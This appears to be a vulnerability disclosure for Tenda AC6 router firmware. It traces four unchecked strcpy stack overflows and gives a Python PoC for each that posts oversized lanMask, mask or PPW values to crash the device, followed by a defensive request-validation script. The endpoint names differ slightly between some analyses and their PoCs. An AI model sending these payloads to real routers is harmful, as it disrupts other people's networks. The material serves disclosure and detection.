ref:ac6_vulns_batch

Hello CVE auditor!

Here are some AC6 DoS vuln points and PoCs :p

thx

Affected version

US_AC6V2.0RTL_V15.03.06.50_multi_TDE01.bin

Stack Overflow

fromAdvSetLanip(overflow arg:lanMask)

Vuln point

http://{target_ip}/goform/AdvSetLanip

Vulnerability analysis

We can find that the webs form handler is defined in formDefineTendDa().

In fromAdvSetLanip(), we control cp and v11; v13 holds the current lan.ip value, which is used shortly after.

Then we just need to make our submitted lanIp differ from v13 (the current lan.ip value), so we set lanIp to some weird value such as “114.51.41.91”, etc.

Then we are almost there: v11 (lanMask, user controllable) is passed to the guest_ip_check() function as argument 2.

Inside guest_ip_check(), a2 points to our controllable argument lanMask, which can be of unlimited length.

initIpAddrInfo() also uses our input as a2, and here we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check. That is dangerous for the saved ra register on the stack. So where is the a4 area?

Going back to guest_ip_check(), we can find that the a4 area points into this function's own stack frame, at the local called v5.

In summary, we need to submit these values:

“lanMask”: payload, “lanIp”: “114.51.41.91” (or something else :p)

PoC

import requests

def exp_AdvSetLanip(target_ip, cookie):
    # POST an oversized lanMask to the handler analysed above; lanIp only has to
    # differ from the device's current lan.ip so the vulnerable path is reached.
    url = f"http://{target_ip}/goform/AdvSetLanip"
    payload = b'a'*(0x30) + b'bbbb\x00'
    data = {
        "lanMask": payload,
        "lanIp": "114.5.14.19"
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response

Demo

setDoublePppoeConfig->guest_ip_check(overflow arg: mask)

Vuln point

http://{target_ip}/goform/WanParameterSetting

Vulnerability analysis

We can find that the webs form handler is defined in formDefineTendDa().

In formWanParameterSetting(), the formWanInfoSet() function is called; we don't even have to control wan1 to get in (because the default value of module is wan1).

Then formWanInfoSet() has a control point: we can set the wanType argument to “5”, so v3 becomes (int)“5”.

That gets us into this branch, which calls the vulnerable function setDoublePppoeConfig().

Then we get into it.

We need to set vpnWanType = 0.

Then we can use staticIp to overflow the stack.

Inside guest_ip_check(), a2 points to our controllable argument mask, which can be of unlimited length.

initIpAddrInfo() also uses our input as a2, and here we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check. That is dangerous for the saved ra register on the stack. So where is the a4 area?

Going back to guest_ip_check(), we can find that the a4 area points into this function's own stack frame, at the local called v5.

In summary, we need to submit these values:

wanType: 5, vpnWanType: 0, mask: payload

PoC

import requests

def exp_setDoublePppoeConfig(target_ip, cookie):
    # wanType=5 selects the setDoublePppoeConfig() branch, vpnWanType=0 reaches
    # guest_ip_check(), and the oversized mask is what gets strcpy'd onto the stack.
    # cookie: the session cookies as a dict (passed straight to requests).
    url = f"http://{target_ip}/goform/WanParameterSetting"
    payload = b'a'*(0x920) + b'bbbb\x00'
    data = {
        "wanType": 5,
        "vpnWanType": 0,
        "mask": payload
    }
    response = requests.post(url, cookies=cookie, data=data)
    return response

Demo

setDoubleL2tpConfig->guest_ip_check(overflow arg: mask)

Vuln point

http://{target_ip}/goform/formWanParameterSetting

Vulnerability analysis

We can find that the webs form handler is defined in formDefineTendDa().

In formWanParameterSetting(), the formWanInfoSet() function is called; we don't even have to control wan1 to get in (because the default value of module is wan1).

Then formWanInfoSet() has a control point: we can set the wanType argument to “4”, so v3 becomes (int)“4”.

That gets us into this branch, which calls the vulnerable function setDoubleL2tpConfig().

Then we get into it.

We need to set vpnWanType (v11) = 0, and v7 (mask) is what gets delivered to guest_ip_check().

Then we can use staticIp to overflow the stack.

Inside guest_ip_check(), a2 points to our controllable argument mask, which can be of unlimited length.

initIpAddrInfo() also uses our input as a2, and here we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check. That is dangerous for the saved ra register on the stack. So where is the a4 area?

Going back to guest_ip_check(), we can find that the a4 area points into this function's own stack frame, at the local called v5.

PoC

import requests

def exp_setDoubleL2tpConfig(target_ip, cookie):
    # wanType=4 selects the setDoubleL2tpConfig() branch; vpnWanType=0 and the
    # oversized mask follow the same path into guest_ip_check() as the PPPoE case.
    url = f"http://{target_ip}/goform/WanParameterSetting"
    payload = b'a'*(0x920) + b'bbbb\x00'
    data = {
        "wanType": 4,
        "vpnWanType": 0,
        "mask": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response

Demo

fromWizardHandle(dos)

Vuln point

http://{target_ip}/goform/WizardHandle

Vulnerability analysis

We can find that the webs form handler is defined in formDefineTendDa().

In case 2 it gets the variable PPW from the web request.

Then it passes the PPW pointer to decodePwd().

decodePwd() is just a dangerously designed function: it copies everything from a1 to a2 without checking the length.

So the v54 stack area is in danger; we can use PPW to overflow it.

However, there are many valuable blocks between the overflowed value and ra.

And we overwrite the a0 slot, which has to point to a valid numeric ASCII string to be delivered as atoi's first argument.

So atoi will finally hit a segmentation fault.

PoC

import requests

def exp_WizardHandle(target_ip, cookie):
    # WANT=2 selects case 2 of fromWizardHandle(); the oversized PPW is copied by
    # decodePwd() into the v54 stack area and the overwritten a0 slot crashes atoi().
    url = f"http://{target_ip}/goform/WizardHandle"
    payload = b'\x76'*(0x16C) + b'bbbb\x00'
    data = {
        "WANT": 2,
        "PPW": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response

Demo
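All four cases above are the same bug class: a form value that should be a short dotted-quad (or a bounded password) is strcpy'd into a fixed stack buffer with no length or format check. The following is an added example, not code from the original post or from the vendor's firmware: it implements the bounds-and-format check that guest_ip_check()/initIpAddrInfo() and decodePwd() lack, and runs it over constructed request records for the endpoints and parameters named in this write-up so a WAF, proxy or log review can flag such requests. The endpoint/parameter map comes from the text above; the 64-character PPW bound, the sample request bodies and the unwatched "/goform/SomethingElse" path are assumptions made for the demonstration.

```python
import ipaddress
from urllib.parse import parse_qs

# Endpoints and form parameters this write-up says reach the unchecked copy
# (guest_ip_check()/initIpAddrInfo() for the address fields, decodePwd() for PPW).
WATCHED_PARAMS = {
    "/goform/AdvSetLanip": ("lanIp", "lanMask"),
    "/goform/WanParameterSetting": ("mask",),
    "/goform/WizardHandle": ("PPW",),
}

MAX_DOTTED_QUAD = len("255.255.255.255")  # 15: longest legal IPv4 string
MAX_PASSWORD_LEN = 64  # assumption: a generous bound for PPW; the real buffer size is not known here


def check_ipv4_field(value):
    """Return None if value is a well-formed dotted-quad, else a short reason.

    This is the bounds-and-format check the firmware should apply before any copy.
    """
    if len(value) > MAX_DOTTED_QUAD:
        return f"length {len(value)} exceeds {MAX_DOTTED_QUAD}"
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return "not a dotted-quad IPv4 address"
    return None


def check_netmask_field(value):
    """Like check_ipv4_field, but also require a contiguous netmask (ones then zeros)."""
    reason = check_ipv4_field(value)
    if reason:
        return reason
    bits = int(ipaddress.IPv4Address(value))
    inverted = ~bits & 0xFFFFFFFF
    # A contiguous mask inverts to 2**n - 1, and only that shape satisfies
    # inverted & (inverted + 1) == 0.
    if inverted & (inverted + 1):
        return "non-contiguous netmask"
    return None


def flag_request(path, body):
    """Inspect one form POST (path + urlencoded body); return [(param, reason), ...]."""
    findings = []
    watched = WATCHED_PARAMS.get(path)
    if not watched:
        return findings
    fields = parse_qs(body, keep_blank_values=True)
    for name in watched:
        for value in fields.get(name, []):
            if name in ("lanMask", "mask"):
                reason = check_netmask_field(value)
            elif name == "lanIp":
                reason = check_ipv4_field(value)
            else:  # PPW is not an address, so only the length bound applies
                reason = (f"length {len(value)} exceeds {MAX_PASSWORD_LEN}"
                          if len(value) > MAX_PASSWORD_LEN else None)
            if reason:
                findings.append((name, reason))
    return findings


# Constructed sample traffic (not captured from a real device): benign configuration
# changes mixed with bodies shaped like the PoCs in this write-up.
SAMPLE_REQUESTS = [
    ("/goform/AdvSetLanip", "lanIp=192.168.0.1&lanMask=255.255.255.0"),
    ("/goform/AdvSetLanip", "lanIp=114.5.14.19&lanMask=" + "a" * 0x30 + "bbbb"),
    ("/goform/WanParameterSetting", "wanType=5&vpnWanType=0&mask=" + "a" * 0x920 + "bbbb"),
    ("/goform/WizardHandle", "WANT=2&PPW=hunter2"),
    ("/goform/WizardHandle", "WANT=2&PPW=" + "v" * 0x16C + "bbbb"),
    ("/goform/SomethingElse", "foo=" + "a" * 5000),  # assumed unwatched path, ignored
]


def scan(records):
    """Return only the (path, findings) pairs that produced at least one finding."""
    results = []
    for path, body in records:
        findings = flag_request(path, body)
        if findings:
            results.append((path, findings))
    return results


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_REQUESTS):
        print(path, findings)
```

Run as a script it prints the three PoC-shaped requests and nothing for the benign ones. The same check_* functions are what a fixed handler would call before copying the field anywhere: a value that fails them is rejected, so nothing longer than 15 bytes ever reaches the stack buffer regardless of how the copy is implemented.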
